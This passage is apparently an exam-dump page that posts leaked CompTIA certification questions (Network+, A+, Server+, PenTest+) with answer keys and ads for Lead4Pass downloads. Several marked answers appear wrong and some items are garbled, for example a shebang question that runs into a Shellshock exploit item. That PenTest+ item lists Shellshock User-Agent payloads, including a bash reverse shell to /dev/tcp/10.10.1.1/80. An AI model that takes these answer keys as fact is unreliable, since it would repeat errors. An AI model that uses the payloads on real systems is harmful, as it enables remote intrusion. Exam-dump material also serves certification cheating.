attacker\\’s actual fingerprint without exploitation. Which of the following is the MOST likely of what happened?
A. The biometric device is tuned more toward false positives
B. The biometric device is configured more toward true negatives
C. The biometric device is set to fail closed
D. The biometnc device duplicated a valid user\\’s fingerpnnt.
Correct Answer: A

 

QUESTION 13
Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical security
assessment an example of?
A. Lockpicking
B. Egress sensor triggering
C. Lock bumping
D. Lock bypass
Correct Answer: D
Reference: https://www.triaxiomsecurity.com/2018/08/16/physical-penetration-test- examples/


Update the latest valid CompTIA PT0-001 test questions and answers throughout the year.
Upload the latest PT0-001 exam practice questions and PT0-001 PDF for free every month. Get the complete PT0-001 Brain Dumps,
the latest updated exam questions and answers come from Lead4Pass! For information about Lead4pass PT0-001 Dumps (including PDF and VCE),
please visit: https://www.leads4pass.com/pt0-001.html (PDF + VCE)

ps. Get free CompTIA PT0-001 dumps PDF online: https://drive.google.com/file/d/1DHqsHNHXdDwNVKJDECqB8p-YwM4rkz1t/

[July-2021 Updated] CompTIA N10-007 Brain Dumps Update includes PDF and VCE from Lead4Pass

The latest updated and revised CompTIA N10-007 exam questions and answers come from Lead4Pass! Complete CompTIA N10-007 dumps certification questions!
Welcome to download the latest Lead4Pass CompTIA N10-007 dumps with PDF and VCE: https://www.leads4pass.com/n10-007.html (1148 Q&A)

[CompTIA N10-007 dumps pdf] CompTIA N10-007 dumps PDF uploaded from google drive, online download provided by the latest update of Lead4pass:
https://drive.google.com/file/d/1hq9wtE0Ac_5_Y7h7qEHBRWbBSIAyOhX1/

Latest update CompTIA N10-007 exam questions and answers online practice test

QUESTION 1
A network technician wants to baseline traffic flows on a specific network. Which of the following will provide the
GREATEST level of detail?
A. Network flow information
B. SNMP traps
C. Debug level syslog
D. Protocol analyzer
Correct Answer: D

 

QUESTION 2
A new employee is unable to access any network resources. All other users are able to access the network at 100Mbps
No IP address, subnet mask or default gateway is displayed on the new employee\\’s workstation The network
administrator determinates all connectors using the correct standard Upon further investigation the network
administrator also notices the following.
Wire map results from the user patch cable lo the patch cable connecting to the switch:
1.
Pins 5 and 7 are short
2.
The distance is 200ft (61m) Additional observations on the switch
1.
The VLAN is set correctly
2.
The port is not disabled
3.
The duplex”;speed settings are correct
4.
Port LEOs are off for that port.
5.
The port is set to untagged.
Which of the following is the MOST likely reason the new employee is having network issues?
A. Bad switchport
B. Incorrect pinout
C. Open/short
D. VLAN mismatch
E. Distance limitation
Correct Answer: A

 

QUESTION 3
A company recently upgraded a legacy firewall to an NGFW. Which of the following can be deployed without extra
hardware to restrict access to offending websites?
A. A UTM appliance
B. Content filtering
C. An IPS
D. A proxy server
Correct Answer: A

 

QUESTION 4
A network technician configures a firewall to block only certain IP addresses from accessing the Internet. All users are
reporting that they are unable to access the Internet.
Which of the following is the MOST likely reason?
A. Incorrectly configured ACL
B. Implicit allow statement
C. SMTP requests are being denied
D. All protocols are being allowed in
Correct Answer: A

 

QUESTION 5
A technician has designed a LAN with redundant switches. Which of the following should be configured to ensure
network availability?
A. VLAN
B. Scope options
C. Spanning tree
D. Flood guard
Correct Answer: C

 

QUESTION 6
A network engineer is hardening the security of a remote office. The firewall at this location needs to remain accessible
for remote management by technicians. The firewall vendor advises disabling port 443 from WAN-facing access. In
addition to disabling port 443, which of the following can the engineer do to MOST effectively balance the remote
connectivity and security needs for this site?
A. Enable an IPSec tunnel.
B. Enable RDP access to the firewall.
C. Enable port 80 access.
D. Enable Telnet access to the firewall
Correct Answer: B

 

QUESTION 7
Which of the following would allow a device to maintain the same IP address lease based on the physical address of the
network card?
A. MAC address reservation
B. Static IP address
C. IP address exclusion
D. Custom DNS server entry
Correct Answer: A

 

QUESTION 8
The security department is looking to install a new IP-based camer
A. Plugging the camera into the available Ethernet jack does not power on the camera. Upon further investigation, the
cable tests fine, and it does provide power to a VoIP phone. Which of the following is MOST likely causing the issue?
B. The brown pair UTP has a short.
C. The camera requires 802. 3at power
D. The camera requires Cat 7 cabling.
E. The switchport has PoE disabled.
Correct Answer: C

 

QUESTION 9
An analog POTS voice line is no longer working and Kim, the technician, is tasked to verify if a dial tone is present at the
IDF. Which of the following tools would be used?
A. Protocol analyzer
B. Butt set
C. OTDR
D. Toner probe
Correct Answer: B

 

QUESTION 10
A technician recently fixed a computer with several viruses and spyware programs on it and notices the Internet settings
were set to redirect all traffic through an unknown proxy. This type of attack is known as which of the following?
A. Phishing
B. Social engineering
C. Man-in-the-middle
D. Shoulder surfing
Correct Answer: C

 

QUESTION 11
Which of the following protocols do MOST MITM attacks utilize?
A. ARP
B. SIP
C. FTP
D. SCP
Correct Answer: A


QUESTION 12
Joe, a technician, was able to copy data at a site with no network equipment between two new laptops, featuring gigabit
Ethernet ports, by using a regular straight-through patch cable. Joe then unsuccessfully tried to accomplish the same
thing at a different site from his laptop with a gigabit Ethernet port to an older customer unit, which had a 10/100 network
port. Which of the following is the cause of this?
A. The customer\\’s laptop does not support auto-MDIX.
B. Joe\\’s laptop does not support auto-MDIX.
C. Straight-through patch cables are prone to crosstalk.
D. The customer\\’s laptop NIC does not support full duplex.
Correct Answer: A

 

QUESTION 13
Which of the following is the SHORTEST way to write 2001:0000:0d58:0000:0000:0095:7565:0001 in proper IPv6
shorthand?
A. 2001::d58::95:7565:1
B. 2001:0:d58:0:0:95:7565:1
C. 2001:0:d58::95:7565:1
D. 2001:0:0d58::95:7565:1
Correct Answer: C


Update the latest valid CompTIA N10-007 test questions and answers throughout the year.
Upload the latest N10-007 exam practice questions and N10-007 PDF for free every month. Get the complete N10-007 Brain Dumps,
the latest updated exam questions and answers come from Lead4Pass! For information about Lead4pass N10-007 Dumps (including PDF and VCE),
please visit: https://www.leads4pass.com/n10-007.html (PDF + VCE)

ps. Get free CompTIA N10-007 dumps PDF online: https://drive.google.com/file/d/1hq9wtE0Ac_5_Y7h7qEHBRWbBSIAyOhX1/

[2021.7 Updated] Valid Lead4Pass CompTIA 220-1002 exam questions with VCE and PDF download

New updated CompTIA 220-1002 exam questions from Lead4Pass CompTIA 220-1002 dumps!
Welcome to download the latest Lead4Pass CompTIA 220-1002 dumps with PDF and VCE: https://www.leads4pass.com/220-1002.html (697 Q&As)

[CompTIA 220-1002 exam pdf] CompTIA 220-1002 exam PDF uploaded from google drive, online download provided by the latest update of Lead4pass:
https://drive.google.com/file/d/10TP39C0SueJWMLwmjBb_WJwOGvkkfMn3/

Latest update CompTIA 220-1002 exam questions and answers online practice test

QUESTION 1
An end user reports a Windows computer is infected with a virus. Which of the following should be the technician\\’s
FIRST troubleshooting step?
A. Identify malware symptoms
B. Disable System Restore
C. Run Windows Update
D. Educate the end user
Correct Answer: A

 

QUESTION 2
An end user contacts the help desk to report a browser issue. When the user selects a hyperlink to a POF file within the
browser, nothing happens. The user notes the browser is otherwise working properly. Which of the following should a
technician direct the user to do FIRST?
A. Ask the user to restart the computer.
B. Install browser updates.
C. Open the link in a different web browser.
D. Disable the pop-up blocker.
Correct Answer: A

 

QUESTION 3
A MAC user\\’s operating system became corrupted, and files were deleted after malware was downloaded. The user
needs to access the data that was previously stored on the MAC. Which of the following built-in utilities should be
used?
A. Time Machine
B. Snapshot
C. System Restore
D. Boot Camp
Correct Answer: A

 

QUESTION 4
Which of the following basic scripting components can be used to repeat an operation until a specific requirement is
met?
A. If-then logic
B. String variables
C. Conditional loop
D. Goto statement
Correct Answer: C

 

QUESTION 5
Which of the following should be enacted to reduce a company\\’s liability and exposure to a potential lawsuit?
A. Acceptable use policy
B. Incident documentation policy
C. Password compliance policy
D. Change control policy
Correct Answer: C

 

QUESTION 6
Which of the following should a technician do FIRST before opening a computer case to replace a part?
A. Remove all jewelry
B. Put on an ESD strap
C. Perform self-grounding
D. Disconnect the power
Correct Answer: A

 

QUESTION 7
A user installed a new SOHO router and new wireless NICs to increase their transmission speed from 802.11b to
802.11g with the manufacturer\\’s default settings. The user lives in an apartment building and is still experiencing
slowness to the Internet after the installations. Which of the following is the MOST secure option that a technician could
implement to resolve this issue?
A. Hide the SSID
B. Assign static IP addresses
C. Enable MAC filtering
D. Disable the WAN port
Correct Answer: C
Reference: http://security.stackexchange.com/questions/755/how-does-basic-http-auth-work

 

QUESTION 8
A technician is troubleshooting a network connectivity issue on a Linux workstation. Which of the following commands
would help the technician gain information about the network settings on the machine?
A. chmod
B. grep
C. ifconfig
D. sudo
Correct Answer: C

 

QUESTION 9
A manager with a restricted user account receives the following error message:
Windows Update cannot currently check for updates because the service is not running.
The manager contacts the help desk to report the error. A technician remotely connects to the user\\’s computer and
identifies the problem. Which of the following should the technician do NEXT?
A. Reboot the computer
B. Restart the network services
C. Roll back the device drivers
D. Rebuild the Windows profiles
Correct Answer: B

 

QUESTION 10
Corporate management is concerned about the security of the company\\’s mobile phones, in the event they are lost or
stolen. Management instructs the IT staff to ensure the data on the devices is not accessible by unauthorized users.
Which of the following would provide the BEST level of protection in this scenario? (Choose two.)
A. Use full device encryption
B. Enable a pattern lock
C. Implement remote wipe features
D. Use device lockout policies
E. Require complex administrator passwords
F. Disable unknown application installations
Correct Answer: AC

 

QUESTION 11
After a virus outbreak due to USB usage, a technician must deny users access to removable hard drives via USB ports
as soon as possible. The technician has been asked to avoid interrupting any users Which of the following is the BEST
way for the technician to perform this security feature?
A. Push a group policy.
B. Assign a local security policy.
C. Create a network login script.
D. Update the AUP
Correct Answer: B

 

QUESTION 12
While troubleshooting a software error on a user\\’s computer, a technician finds inappropriate content. Which of the
following should the technician perform FIRST?
A. Preserve the data on an external drive.
B. Report the discovery through proper channels.
C. Document the findings.
D. Erase the data and inform the user.
Correct Answer: C

 

QUESTION 13
A small business, which is located in a Hood plain, wants a technician to recommend a backup strategy that will allow
for Its flies to be recovered at an alternate location within a few days following a disaster. Which of the following backup
methodologies will the technician MOST likely recommend\\’\\’
A. Implement a hoi site in an area outside the flood plain.
B. Move all servers to an laaS provider and only use SaaS applications
C. Install cloud backup software and use it (or regular backups
D. Configure local tape backups and store them in a safe on site.
Correct Answer: C


The above content: shared 220-1002 exam pdf, 220-1002 Exam Questions, And Answers and get the complete 220-1002 exam dumps path. For information about 220-1002 Dumps from Lead4pass (including PDF and VCE), please visit: https://www.leads4pass.com/220-1002.html (697 Q&A)

ps. Get free CompTIA 220-1002 dumps PDF online: https://drive.google.com/file/d/10TP39C0SueJWMLwmjBb_WJwOGvkkfMn3/

[2021.7 Updated] Valid Lead4Pass CompTIA 220-1001 exam questions with VCE and PDF download

New updated CompTIA 220-1001 exam questions from Lead4Pass CompTIA 220-1001 dumps!
Welcome to download the latest Lead4Pass CompTIA 220-1001 dumps with PDF and VCE: https://www.leads4pass.com/220-1001.html (613 Q&As)

[CompTIA 220-1001 exam pdf] CompTIA 220-1001 exam PDF uploaded from google drive, online download provided by the latest update of Lead4pass:
https://drive.google.com/file/d/10TP39C0SueJWMLwmjBb_WJwOGvkkfMn3/

Latest update CompTIA 220-1001 exam questions and answers online practice test

QUESTION 1
A network technician is troubleshooting Internet connectivity issues on a customer\\’s wired network. All PCs at the site
are able to connect to local resources but not the Internet. The technician suspects the customer\\’s router may have
failed during a recent power outage. To verify this assumption, the technician should connect a laptop to:
A. an AP\\’s guest network.
B. the network switch.
C. a phone hotspot.
D. the cable modem.
Correct Answer: A

 

QUESTION 2
A technician needs to give users the ability to transfer files between mobile devices. The technician teaches the staff
how to use a file transfer method in which the devices need to be in close proximity with line-of-sight access to each
other. Which of the following technologies is the technician teaching to the staff?
A. IR
B. Bluetooth
C. Tethering
D. NFC
Correct Answer: A

 

QUESTION 3
The IT department recently updated client computers for the graphics department. A user reports the new computer has
not worked since it was set up; it makes unusual sounds when pressing the power button. A technician verifies the
power cable works and the computer is connected properly to both data and power. The monitor powers on but only
displays the message: No source.
Which of the following BEST explains the cause of this issue?
A. There is insufficient power to the computer
B. There is back screen on system boot.
C. The computer is overheating.
D. The error beep codes on POST.
Correct Answer: A


QUESTION 4
Which of the following cable types prevents electromagnetic Interference and is typically used In Industrial
environments?
A. PVC
B. Plenum
C. STP
D. UTP
Correct Answer: C

 

QUESTION 5
A technician will be installing a workstation with virtualization software. On which of the following system requirements
should the technician focus? (Select TWO).
A. BD-R
B. GPU
C. RAM
D. LAN
E. SATA
F. CPU
Correct Answer: CF

 

QUESTION 6
A user wants to do weekly full-system backups on a laptop while minimizing the time required to perform the task.
Which of the following would be BEST to use?
A. Thunderbolt 2
B. USB 3.1
C. 802.11ac
D. 802.3ab
Correct Answer: A


QUESTION 7
A customer is purchasing a gaming laptop and wants the maximum number of IOPS. Which of the following hard drives
should be installed in the laptop?
A. Hybrid SSD
B. SATA SSD
C. NVMe SSD
D. IDE SSD
Correct Answer: C

 

QUESTION 8
A user reports paper output from a printer has toner that is not sticking to the page. The output smears when it is
touched. A technician notes the appropriate paper is being used. The toner appears to be low but is a supported OEM
cartridge. Which of the following would MOST likely fix this issue?
A. Replace the developer roll.
B. Replace the toner.
C. Find and remove any jammed paper.
D. Replace the fuser.
E. Replace the drum.
Correct Answer: A

 

QUESTION 9
A user is experiencing email problems and explains to a technician that all emails with graphics or images do not display
the graphics. Which of the following configurations would correct this behavior?
A. Change the email settings in antivirus.
B. Change the security settings of the email client.
C. Change the firewall security settings.
D. Change the email proxy settings.
E. Change the trusted sites in the browser settings.
Correct Answer: B


QUESTION 10
Which of the following devices is susceptible to broadcast storms if configured incorrectly?
A. Access point
B. Router
C. Switch
D. Cable modem
Correct Answer: B

 

QUESTION 11
Which of the following colors is used to designate a USB 3.0 connector?
A. Blue
B. Black
C. Green
D. White
Correct Answer: A

 

QUESTION 12
Which of the following network servers would be MOST useful in translating a URL into an IP address?
A. Print server
B. DNS server
C. Mail server
D. DHCP server
E. Web server
Correct Answer: B

 

QUESTION 13
A technician is troubleshooting what appears to be a RAM issue on a PC. Which of the following symptoms would
indicate if this is a RAM issue?
A. POST code beeps
B. Distended capacitors
C. Continuous reboots
D. Wrong BIOS time
Correct Answer: C


The above content: shared 220-1001 exam pdf, 220-1001 Exam Questions And Answers, 220-1001 exam video, and get the complete 220-1001 exam dumps path.
For information about 220-1001 Dumps from Lead4pass (including PDF and VCE), please visit: https://www.leads4pass.com/220-1001.html (613 Q&A)

ps. Get free CompTIA 220-1001 dumps PDF online: https://drive.google.com/file/d/10TP39C0SueJWMLwmjBb_WJwOGvkkfMn3/

[2021.7 Updated] Valid Lead4Pass CompTIA SK0-005 exam questions with VCE and PDF download

New updated CompTIA SK0-005 exam questions from Lead4Pass CompTIA SK0-005 dumps!
Welcome to download the latest Lead4Pass CompTIA SK0-005 dumps with PDF and VCE: https://www.leads4pass.com/sk0-005.html (101 Q&As)

[CompTIA SK0-005 exam pdf] CompTIA SK0-005 exam PDF uploaded from google drive, online download provided by the latest update of Lead4pass:
https://drive.google.com/file/d/18VKBpK4V8XJzN2cSY4UEKG-XW9IHIlkq/

Latest update CompTIA SK0-005 exam questions and answers online practice test

QUESTION 1
A company\\’s IDS has identified outbound traffic from one of the web servers coming over port 389 to an outside
address. This server only hosts websites. The company\\’s SOC administrator has asked a technician to harden this
server. Which of the following would be the BEST way to complete this request?
A. Disable port 389 on the server
B. Move traffic from port 389 to port 443
C. Move traffic from port 389 to port 637
D. Enable port 389 for web traffic
Correct Answer: C
Reference: https://www.auditmypc.com/tcp-port-637.asp https://docs.microsoft.com/en-us/answers/questions/66908/isport-389-on-ad-in-anyway-used-or-requiredwhen.html

 

QUESTION 2
A company is building a new datacenter next to a busy parking lot. Which of the following is the BEST strategy to
ensure wayward vehicle traffic does not interfere with datacenter operations?
A. Install security cameras
B. Utilize security guards
C. Install bollards
D. Install a mantrap
Correct Answer: C

 

QUESTION 3
Which of the following will correctly map a script to a home directory for a user based on username?
A. \\server\users$\username
B. \\server\%username%
C. \\server\FirstInitialLastName
D. \\server\$username$
Correct Answer: B
Reference: https://social.technet.microsoft.com/Forums/windows/en-US/07cfcb73-796d-48aa-96a9-08280a1ef25a/mapping-home-directory-with-username-variable?forum=w7itprogeneral


QUESTION 4
A server administrator needs to harden a server by only allowing secure traffic and DNS inquiries. A port scan reports
the following ports are open:
A. 21
B. 22
C. 23
D. 53
E. 443
F. 636
Correct Answer: D
Reference: https://tools.cisco.com/security/center/resources/dns_best_practices

 

QUESTION 5
A server administrator has noticed that the storage utilization on a file server is growing faster than planned. The
administrator wants to ensure that, in the future, there is a more direct relationship between the number of users using
the server and the amount of space that might be used. Which of the following would BEST enable this correlation?
A. Partitioning
B. Deduplication
C. Disk quotas
D. Compression
Correct Answer: C

 

QUESTION 6
A large number of connections to port 80 is discovered while reviewing the log files on a server. The server is not
functioning as a web server. Which of the following represent the BEST immediate actions to prevent unauthorized
server access? (Choose two.)
A. Audit all group privileges and permissions
B. Run a checksum tool against all the files on the server
C. Stop all unneeded services and block the ports on the firewall
D. Initialize a port scan on the server to identify open ports
E. Enable port forwarding on port 80
F. Install a NIDS on the server to prevent network intrusions
Correct Answer: AD

 

QUESTION 7
A technician is trying to determine the reason why a Linux server is not communicating on a network. The returned
network configuration is as follows:
eth0: flags=4163 mtu 1500 inet 127.0.0.1 network
255.255.0.0 broadcast 127.0.0.1
Which of the following BEST describes what is happening?
A. The server is configured to use DHCP on a network that has multiple scope options
B. The server is configured to use DHCP, but the DHCP server is sending an incorrect subnet mask
C. The server is configured to use DHCP on a network that does not have a DHCP server
D. The server is configured to use DHCP, but the DHCP server is sending an incorrect MTU setting
Correct Answer: B

 

QUESTION 8
Which of the following actions should a server administrator take once a new backup scheme has been configured?
A. Overwrite the backups
B. Clone the configuration
C. Run a restore test D. Check the media integrity
Correct Answer: D

 

QUESTION 9
A technician needs to provide a VM with high availability. Which of the following actions should the technician take to
complete this task as efficiently as possible?
A. Take a snapshot of the original VM
B. Clone the original VM
C. Convert the original VM to use dynamic disks
D. Perform a P2V of the original VM
Correct Answer: A
Reference: https://forsenergy.com/en-us/virtual_help/html/1325909c-5878-4674-a152-3fd3d4e8e3c6.htm

 

QUESTION 10
A server administrator wants to run a performance monitor for optimal system utilization. Which of the following metrics
can the administrator use for monitoring? (Choose two.)
A. Memory
B. Page file
C. Services
D. Application
E. CPU
F. Heartbeat
Correct Answer: AE

 

QUESTION 11
A server is reporting a hard drive S.M.A.R.T. error. When a technician checks on the drive, however, it appears that all
drives in the server are functioning normally. Which of the following is the reason for this issue?
A. A S.M.A.R.T. error is a predictive failure notice. The drive will fail in the near future and should be replaced at the
next earliest time possible
B. A S.M.A.R.T. error is a write operation error. It has detected that the write sent to the drive was incorrectly formatted
and has requested a retransmission of the write from the controller
C. A S.M.A.R.T. error is simply a bad sector. The drive has marked the sector as bad and will continue to function
properly
D. A S.M.A.R.T. error is an ECC error. Due to error checking and correcting, the drive has corrected the missing bit and
completed the write operation correctly.
Correct Answer: C
Reference: https://www.backblaze.com/blog/what-smart-stats-indicate-hard-drive-failures/

 

QUESTION 12
Which of the following should an administrator use to transfer log files from a Linux server to a Windows workstation?
A. Telnet
B. Robocopy
C. XCOPY
D. SCP
Correct Answer: D

 

QUESTION 13
A server administrator was asked to build a storage array with the highest possible capacity. Which of the following
RAID levels should the administrator choose?
A. RAID 0
B. RAID 1
C. RAID 5
D. RAID 6
Correct Answer: A
Reference: https://www.thinkmate.com/inside/articles/what-is-raid


The above content: shared SK0-005 exam pdf, SK0-005 Exam Questions And Answers, SK0-005 exam video, and get the complete SK0-005 exam dumps path.
For information about SK0-005 Dumps from Lead4pass (including PDF and VCE), please visit: https://www.leads4pass.com/sk0-005.html (101 Q&A)

ps. Get free CompTIA SK0-005 dumps PDF online: https://drive.google.com/file/d/18VKBpK4V8XJzN2cSY4UEKG-XW9IHIlkq/

[2021.7 Updated] Valid Lead4Pass CompTIA PT1-002 exam questions with VCE and PDF download

New updated CompTIA PT1-002 exam questions from Lead4Pass CompTIA PT1-002 dumps!
Welcome to download the latest Lead4Pass CompTIA PT1-002 dumps with PDF and VCE: https://www.leads4pass.com/pt1-002.html (131 Q&As)

[CompTIA PT1-002 exam pdf] CompTIA PT1-002 exam PDF uploaded from google drive, online download provided by the latest update of Lead4pass:
https://drive.google.com/file/d/1jfu5vT3U5z0UcbNIL1v2QvLxF4MJj7E4/

Latest update CompTIA PT1-002 exam questions and answers online practice test

QUESTION 1
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?
A. NDA
B. MSA
C. SOW
D. MOU
Correct Answer: C

 

QUESTION 2
An attacker performed a MITM attack against a mobile application. The attacker is attempting to manipulate the
application\\’s network traffic via a proxy tool. The attacker only sees limited traffic as cleartext. The application log files
indicate secure SSL/TLS connections are failing. Which of the following is MOST likely preventing proxying of all traffic?
A. Misconfigured routes
B. Certificate pinning
C. Strong cipher suites
D. Closed ports
Correct Answer: B

 

QUESTION 3
A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the
following:
Pre-engagement interaction (scoping and ROE) Intelligence gathering (reconnaissance) Threat modeling Vulnerability
analysis Exploitation and post exploitation Reporting
Which of the following methodologies does the client use?
A. OWASP Web Security Testing Guide
B. PTES technical guidelines
C. NIST SP 800-115
D. OSSTMM
Correct Answer: B
Reference: https://kirkpatrickprice.com/blog/stages-of-penetration-testing-according-to-ptes/


QUESTION 4
A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some
of the files that were discovered through this vulnerability are: Which of the following is the BEST method to help an
attacker gain internal access to the affected machine?comptia pt1-002 exam questions q4

A. Edit the discovered file with one line of code for remote callback
B. Download .pl files and look for usernames and passwords
C. Edit the smb.conf file and upload it to the server
D. Download the smb.conf file and look at configurations
Correct Answer: C

 

QUESTION 5
When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified.
Which of the following character combinations should be used on the first line of the script to accomplish this goal?
A. and1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
Which of the following edits should the tester make to the script to determine the user context in which the server is
being run?
A. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i id;whoami”, “Accept”:
“text/html,application/xhtml+xml,application/xml”}
B. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>and find / -perm -4000”, “Accept”:
“text/html,application/xhtml+xml,application/xml”}
C. exploits = {“User-Agent”: “() { ignored;};/bin/sh –i ps –ef” 0>and1”, “Accept”:
“text/html,application/xhtml+xml,application/xml”}
D. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>and /dev/tcp/10.10.1.1/80” 0>and1”, “Accept”:
“text/html,application/xhtml+xml,application/xml”}
Correct Answer: D

 

QUESTION 6
A manager calls upon a tester to assist with diagnosing an issue within the following:
Python script: #!/usr/bin/python s = “Administrator”
The tester suspects it is an issue with string slicing and manipulation Analyze the following code segment and drag and
drop the correct output for each string manipulation to its corresponding code segment Options may be used once or
not at all.
Select and Place:comptia pt1-002 exam questions q6

Correct Answer:

comptia pt1-002 exam questions q6-1


The above content: shared PT1-002 exam pdf, PT1-002 Exam Questions And Answers, PT1-002 exam video, and get the complete PT1-002 exam dumps path.
For information about PT1-002 Dumps from Lead4pass (including PDF and VCE), please visit: https://www.leads4pass.com/pt1-002.html (131 Q&A)

ps. Get free CompTIA PT1-002 dumps PDF online: https://drive.google.com/file/d/1jfu5vT3U5z0UcbNIL1v2QvLxF4MJj7E4/